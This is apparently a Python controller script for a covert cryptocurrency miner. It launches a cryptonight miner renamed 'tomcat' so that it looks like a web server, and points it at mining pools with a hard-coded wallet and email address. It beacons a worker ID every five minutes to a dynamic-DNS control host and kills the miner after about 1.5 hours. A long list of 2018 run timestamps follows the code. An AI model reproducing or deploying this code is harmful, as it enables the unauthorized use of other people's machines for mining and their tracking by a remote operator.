import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:30:05.932922
#2018-02-17 17:18:04.227581
#2018-02-17 19:06:02.109084
#2018-02-17 20:53:07.136830
#2018-02-17 22:39:06.426914
#2018-02-18 00:22:05.183181
#2018-02-18 02:13:04.797260
#2018-02-18 04:00:08.279646
#2018-02-18 05:51:06.076484
#2018-02-18 07:42:07.224141
#2018-02-18 09:29:04.810820
#2018-02-18 11:16:05.448496
#2018-02-18 13:02:02.039217
#2018-02-18 14:51:03.965113
#2018-02-18 16:39:03.825246
#2018-02-18 18:28:05.151302
#2018-02-18 20:16:05.079375
#2018-02-18 22:01:07.242415
#2018-02-18 23:50:06.693207
#2018-02-19 01:36:05.142208
#2018-02-19 03:24:04.996877
#2018-02-19 05:09:07.574373
#2018-02-19 06:56:04.830999
#2018-02-19 08:45:09.070633
#2018-02-19 10:34:04.446852
#2018-02-19 12:22:01.987597
#2018-02-19 14:09:03.803778
#2018-02-19 15:59:01.416425
#2018-02-19 17:48:04.272367
#2018-02-19 19:34:07.282112
#2018-02-19 21:21:08.095584
#2018-02-19 23:07:05.550213
#2018-02-20 00:51:03.696480
#2018-02-20 02:40:09.620422
#2018-02-20 04:29:01.315262
#2018-02-20 06:12:05.626942
#2018-02-20 07:57:06.339471
#2018-02-20 09:43:04.615372
#2018-02-20 11:27:07.348813
#2018-02-20 13:14:01.788231
#2018-02-20 14:58:06.691662
#2018-02-20 16:42:05.437371
#2018-02-20 18:28:09.628311
#2018-02-20 20:19:04.376782
#2018-02-20 22:04:06.654354
#2018-02-20 23:45:11.508070
#2018-02-21 01:28:08.076974
#2018-02-21 03:16:07.132933
#2018-02-21 05:05:04.070416
#2018-02-21 06:52:09.022061
#2018-02-21 08:39:06.439605
#2018-02-21 10:25:09.079862
#2018-02-21 12:12:09.125467
#2018-02-21 14:01:06.456430
#2018-02-21 15:45:09.036152
#2018-02-21 17:36:09.747470
#2018-02-21 19:23:07.484451
#2018-02-21 21:12:04.125062
#2018-02-21 22:58:05.212206
#2018-02-22 00:48:06.863211
#2018-02-22 02:35:01.435396
#2018-02-22 04:21:03.955718
#2018-02-22 06:09:01.952428
#2018-02-22 07:54:05.896505
#2018-02-22 09:43:04.400719
#2018-02-22 11:28:03.729740
#2018-02-22 13:14:04.376844
#2018-02-22 15:04:01.468083
#2018-02-22 16:48:02.078315
#2018-02-22 18:36:08.679998
#2018-02-22 20:28:04.500552
#2018-02-22 22:15:07.665720
#2018-02-23 00:01:05.990430
#2018-02-23 01:49:04.258810
#2018-02-23 03:38:07.375552
#2018-02-23 05:22:05.180309
#2018-02-23 07:07:05.859320
#2018-02-23 08:56:07.622930
#2018-02-23 11:15:06.447842
#2018-02-23 13:10:10.419693
#2018-02-23 14:55:06.412832
#2018-02-23 16:44:02.160673
#2018-02-23 18:35:08.699005
#2018-02-23 20:24:04.487575
#2018-02-23 22:11:08.188067
#2018-02-23 23:58:01.601169
#2018-02-24 01:47:04.697822
#2018-02-24 03:39:01.719073
#2018-02-24 05:22:05.949112
#2018-02-24 07:10:07.670956
#2018-02-24 08:57:04.432054
#2018-02-24 10:36:05.017726
#2018-02-24 12:23:06.413955
#2018-02-24 14:17:05.868015
#2018-02-24 16:04:03.894231
#2018-02-24 17:56:04.253863
#2018-02-24 19:43:01.879746
#2018-02-24 21:29:05.511572
#2018-02-25 00:13:06.135917
#2018-02-25 03:25:07.882149
#2018-02-25 07:11:01.643770